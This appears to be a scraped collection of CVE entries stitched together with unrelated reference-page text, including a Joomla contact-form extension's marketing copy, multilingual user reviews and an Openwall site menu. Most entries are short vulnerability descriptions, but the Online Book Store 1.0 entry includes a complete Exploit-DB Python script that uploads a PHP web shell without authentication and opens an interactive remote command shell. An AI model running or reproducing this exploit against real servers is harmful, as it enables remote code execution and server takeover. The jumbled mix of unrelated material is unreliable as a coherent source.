CSRF in admin/add-news.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new news article via a crafted request.

March 19, 2019

**Analyzing PHPKB v9: Part one**

The first part of a series where I will talk about vulnerabilities found in a knowledge-base software written in PHP. Vulnerabilities analyzed: Arbitrary File Download, Remote Code Execution, Blind Cross-Site Scripting, Arbitrary File Renaming, Arbitrary Folder Deletion, CSV Injection, Arbitrary File Listing.

CVE-2020-10479: Home

CSRF in admin/add-glossary.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new glossary term via a crafted request.

CVE-2020-10481: Home

Reflected XSS in admin/manage-articles.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to inject arbitrary web script or HTML via the GET parameter sort.

CVE-2020-10471: Home

CSRF in admin/add-category.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new category via a crafted request.

CVE-2020-10480: Home

An unauthenticated file upload vulnerability has been identified in admin_add.php in PHPGurukul Online Book Store 1.0. The vulnerability could be exploited by an unauthenticated remote attacker to upload content to the server, including PHP files, which could result in command execution.

    # Exploit Title: Online Book Store 1.0 - Unauthenticated Remote Code Execution
    # Google Dork: N/A
    # Date: 2020-01-07
    # Exploit Author: Tib3rius
    # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
    # Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
    # Version: 1.0
    # Tested on: Ubuntu 16.04
    # CVE: N/A
    
    import argparse
    import random
    import requests
    import string
    import sys
    
    parser = argparse.ArgumentParser()
    parser.add_argument('url', action='store', help='The URL of the target.')
    args = parser.parse_args()
    
    url = args.url.rstrip('/')
    random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))
    
    payload = '<?php echo shell_exec($_GET[\'cmd\']); ?>'
    
    file = {'image': (random_file + '.php', payload, 'text/php')}
    print('> Attempting to upload PHP web shell...')
    r = requests.post(url + '/admin_add.php', files=file, data={'add':'1'}, verify=False)
    print('> Verifying shell upload...')
    r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)
    
    if random_file in r.text:
        print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php')
        print('> Example command usage: ' + url + '/bootstrap/img/' + random_file + '.php?cmd=whoami')
        launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))
        if launch_shell.lower() == 'y':
            while True:
                cmd = str(input('RCE $ '))
                if cmd == 'exit':
                    sys.exit(0)
                r = requests.get(url + '/bootstrap/img/' + random_file + '.php', params={'cmd':cmd}, verify=False)
                print(r.text)
    else:
        if r.status_code == 200:
            print('> Web shell uploaded to ' + url + '/bootstrap/img/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')
        else:
            print('> Web shell failed to upload! The web server may not have write permissions.')

CVE-2020-10224: OffSec’s Exploit Database Archive

An unauthenticated file upload vulnerability has been identified in admin/gallery.php in PHPGurukul Job Portal 1.0. The vulnerability could be exploited by an unauthenticated remote attacker to upload content to the server, including PHP files, which could result in command execution.

**CVEs / Exploits**

*   Online Book Store 1.0 - Unauthenticated Remote Code Execution
*   Job Portal 1.0 - Remote Code Execution

CVE-2020-10225: CVEs

QEMU 4.1.0 has a memory leak in zrle_compress_data in ui/vnc-enc-zrle.c during a VNC disconnect operation because libz is misused, resulting in a situation where memory allocated in deflateInit2 is not freed in deflateEnd.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

CVE-2019-20382: security - CVE-2019-20382 QEMU: vnc: memory leakage upon disconnect

Stored XSS exists in the Appointment Booking Calendar plugin before 1.3.35 for WordPress. In the cpabc_appointments.php file, the Calendar Name input could allow attackers to inject arbitrary JavaScript or HTML.

CVE-2020-9371

The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.

CVE-2020-9757: craft-seomatic/CHANGELOG.md at v3 · nystudio107/craft-seomatic

An issue was discovered in helpers/mailer.php in the Creative Contact Form extension 4.6.2 before 2019-12-03 for Joomla!. A directory traversal vulnerability resides in the filename field for uploaded attachments via the creativecontactform_upload parameter. An attacker could exploit this vulnerability with the "Send me a copy" option to receive any files of the filesystem via email.

**Main Features**

✔ _Insert forms anywhere in content_  
✔ _All texts are fully customizable_  
✔ _Flexible field types_ - name, email, phone, address, url, number, textarea, select, multiple select, checkbox, radio  
✔ _Completely new checkbox, radio selection effect, implemented special for this extension_  
✔ _Load countries list (239 countries)_  
✔ _Flexible and user friendly interface for inputting checkbox,radio/select options_  
✔ _Set pre-checked/selected options for checkbox,radio/select types_  
✔ _Multiple email recipients, BCC, custom reply to email, from email_  
✔ _Automatically fill in User name and email if logged in_  
✔ _Allows page redirect to URL or menu item after sending email_  
✔ _Set all fields as required or not_  
✔ _Ajax based - no page reload_  
✔ _High level Spam protection_  
✔ _Custom email subject_  
✔ _Shake effect if field is not valid_  
✔ _Very easy to install and configure_

_Creative Contact Form_ is structured for creating:

*   Contact Forms
*   Application Forms
*   Reservation Forms
*   Survey Forms
*   Contact Data Pages
*   and much more.

You will get ready-to-use form just after installation!

✉ _SUPPORT_: If you think you found a bug or have any problem or question concerning this extension, do not hesitate to contact us via info@creative-solutions.net

_REQUIREMENTS_: This extension requires Joomla 3.X or higher.

**FREQUENTLY ASKED QUESTIONS**

**1\. How can I install Creative Contact Form?**

Sign in to Joomla! administrative panel as a Super User, then go to Extensions > Extension Manager page. Press Choose file (Browse) button and select the .zip folder of Creative Contact Form. Click Upload and Install.

**2\. How can I activate Creative Contact Form plugin?**

Navigate to Extensions > Plug-in Manager page, and search for Creative Contact Form. Enable System - Creative Contact Form plugin, and you will be able to load forms with a shortcode in articles and custom modules.

**3\. How can I publish the created forms as a menu item?**

Create a new menu item in your menu first. Then, select the type of your menu item to Creative Contact Form.

You will see a field for selecting a form, with the list of active forms titles. Just select desired form there.

**4\. How can I display my form in a module position?**

Navigate to Extensions > Module Manager page, then search for Creative Contact Form Module. Edit it, and set Module Assignment and Position.

Make sure to set status to Published. There is a field Select Creative Form, with list of acive forms. Just select desired form there.

**5\. Can the form be inserted into a Joomla! article?**

Firstly, please enable System - Creative Contact Form plugin from Extensions > Plug-in Manager page. Afterwards, navigate to Components > Creative Contact Form > Forms page from the top menu of your Joomla! administrative panel.

Select the shortcode of the form you want to publish . Copy the code and paste it into your article.

**7\. Can I send the submitted information of a form to multiple email addresses?**

Go to Components->Creative Contact Form->Forms->Your Form->Email Options, where you will find Email To field. It lets you write multiple email addresses as recipients. Make sure to separate them with comma.

Also, CC and BCC options will let you select extra recipients.

Keywords: Contact Form Builder, Contact Us, Contact Form Generator, Contact Form Maker, Custom Forms, Feedback Form, Survey, Event Registration, Hotel Reservation, Joomla Forms, Joomla Form, Joomla Form Builder, Joomla AJAX Forms, AJAX Form, AJAX Contact Form, Joomla Form Maker, joomla contact form, contact forms joomla, joomla contact form module, joomla contact module forms, Joomla Form Creator, responsive contact forms joomla, contact forms, joomla contact forms free, contact form for joomla, joomla contact component, contact forms plugin, contact form, contact forms, responsive contact forms, joomla contact us form, joomla contact us, free joomla contact forms, joomla contact form extension, joomla extensions forms, joomla forms free, forms for joomla, Creative Forms, Creative Themes, Template Creator Wizard, Template Customization, CS Forms, CS Builder, CS Vision LAB

➤ IMPORTANT: Please do NOT use reviews to submit bug reports, feature requests, and suggestions. For such stuff use the support forum instead.

**Functionality**

Simple, yet powerful and secure, does not get any better. Used many other forms before we chose this for our business website.

**Ease of use**

Extremely easy to use and install and with all the features that are needed for a contact form.

**Support**

Excellent support, quick response time and prompt resolutions. Developer always responds in less than 24 hours.

**Documentation**

Excellent built in documentation although the application is very intuitive and very rarely do you have to check documentation

I used this to: Business website contact form that we place on almost all pages for ease of contact

**Functionality**

Niet teveel niet te weinig en daardoor overzichtelijk. Meer is er niet nodig.

**Ease of use**

Zelfs een leek kan hiermee overweg het is helder en duidelijk en laat niets te wensen over.

**Support**

Ik heb, door mijn provider, ook support nodig gehad maar dat ging uiterst vriendelijk, snel en oplossingsgericht.

**Documentation**

Summier maar daardoor ook niet teveel onzin.Ik geef toe dat ik de handleiding niet geheel gelezen heb.

I used this to: mijn zakelijke website ter vervanging van Flexicontact dat ineens niet meer wilde werken.

**Functionality**

The extension comes with just about any type of form type you might need with prebuilt templates. Saved me a great deal of time!

**Ease of use**

It has awesome drag and drop features and access to CSS and SCRIPTING code from the form control panel. Practical for novice or developer.

**Support**

I asked for some advice on customization and had a response within minutes. Unlike many extensions, this support team knows their product!

**Documentation**

I see that it is extensive but I did not need to use it, the layout of the form builder is so intuitive.

I used this to: I use this for Contact Forms, a reservation system and a support submission tool. I am moving about a dozen of my current web sites to this extension.

**Functionality**

Did exactly what it said on the tin, creates a professional looking contact form on your website.

**Ease of use**

Easy to setup, my fault for not choosing the correct version at the outset, had to upgrade to get the complex forms element with maps.

**Support**

Had an issue with the component stripping out text that I put into fields, this was quickly resolved without fuss by Simon. Great support.

**Documentation**

I used this to: the contact page on my website, add a professional level to the page, over and above what can be achieved with Joomla itself.

**Functionality**

Doet precies (en misschien nog wel meer) wat het moet doen. Een top formulier

**Ease of use**

Super simpel en eenvoudig. Installeren ging super snel en ook het opzetten van een formulier kostte weinig energie.

**Support**

Top service, super snelle reactie en oplossing! Zelfs in het weekend gaan ze gewoon door.

**Documentation**

Lekker duidelijk en helder omschreven, op deze manier kan het niet mis gaan.

I used this to: Een klachten formulier voor een website over opleidingen voor "eerste hulp bij ongelukken".

**Functionality**

Der Umfang ist gigantisch. Ob ein einfaches Email-Formular an einen Kollegen oder an mehrere Kollegen, kein Problem mit CCF.

**Ease of use**

Es ist alles leicht verständlich und einfach einzurichten. Wenn man im Englischen keine Probleme hat.

**Support**

Schnell und hilfsbereit. Man erhält binnen eines Tages eine Antwort. Sicher auf englisch aber dies sollte für kein Problem sein.

**Documentation**

Sehr ausführlich und leicht verständlich. Wenn man doch mal Fragen hat, hilft der Support sehr zügig.

I used this to: Wir nutzten es für die Homepage einer Schule, um Krankmeldungen und Kontakte zu bestimmten Bereichen herzustellen.

**Functionality**

Funciona muy bien el componente y es relativamente fácil de manejar.

**Ease of use**

Es fácil de usar y relativamente intuitivo, creo que podrían incluirle unos botones para quitar la sombra por default que tienen los textos

**Support**

El soporte es muy bueno y rápido, me contestó Simon muy rápido y resolvió el requerimiento

**Documentation**

La documentación es buena, pero si les faltan videos y tutoriales que muestren ejemplos de cómo se usa el componente.

I used this to: Uso este componente para mis páginas de Joomla, lo estoy empezando a usar y al parecer todo va bien.

**Functionality**

This is by far, the MOST USEFUL, POWERFUL Contact form component on this joomla org site. MORE FUNCTIONS than you would expect. A MUST HAVE!

**Ease of use**

PEACE OF MIND! Very easy to use. packed with IMPORTANT features and functions. Never complicated , many ready to use forms, easy to edit

**Support**

HONEST and VERY PROMPT SUPPORT. Reliable, and helpful if you ask for help. 95% chance you wont need support because CCF is straightforward!

**Documentation**

More than well documented. Tool tips, and descriptions on each option, functions makes it very easy to understand and use. Well EXPLAINED!

I used this to: For my website contact form, product inquiry forms, popup contact us, call me back form, job application form, file upload form.. too many to list.. since joomla 2.5 over 7yrs and still loving it. I call this CCF component the JACK of ALL PURPOSE FORM creation. NO COMPETTION!

Owner's reply: Hi,

Thanks for suck a beautiful review!

We work hard to keep our clients satisfied.

Joomla!4 version is also ready, you can make update.

Thanks,  
Regards, Simon

**Functionality**

The extension offers loads of functions and comes with dozens of pre-installed templates and demo-forms.

**Ease of use**

Setup is straight forward and very easy. You can start from a demo-form or build one from scratch within a few minutes.

**Support**

The developer responded to my email within one day and immediately provided the correct solution to fix my issue!

**Documentation**

The documentation is absolutely sufficient and covers everything you might need in order to create any form for your purposes.

I used this to: Ordering coupons and requesting prices and room availabilities on a hotel website.

**Functionality**

Extension qui fonctionnait bien jusqu'à octobre 2020 mais qui n'a apparemment pas supporté les évolutions successives de Joomla!

**Ease of use**

Cette extension n'est pas très compliquée à utiliser. Une documentation est accessible sur le site du créateur.

**Support**

Support inexistant depuis plusieurs mois. Aucune réponse aux mails et en plus la page dédiée du forum est polluée par des spammeurs.

**Documentation**

Documentation correcte même si elle pourrait être largement améliorée.

I used this to: J'utilisai cette extension (version Business) comme formulaire de contact pour un site dédié à la Magie pour les demandes d'adhésion ou de prestation. Depuis octobre 2020, cette extension ne fonctionne plus et pas de réponse du créateur à mes emails.

Owner's reply: Hi,

I was at hospital for some time, so the extensions has not be supported for some time.  
I'm really sorry about that.  
Now I come back, and can give full support.

Thanks.

Tag

#php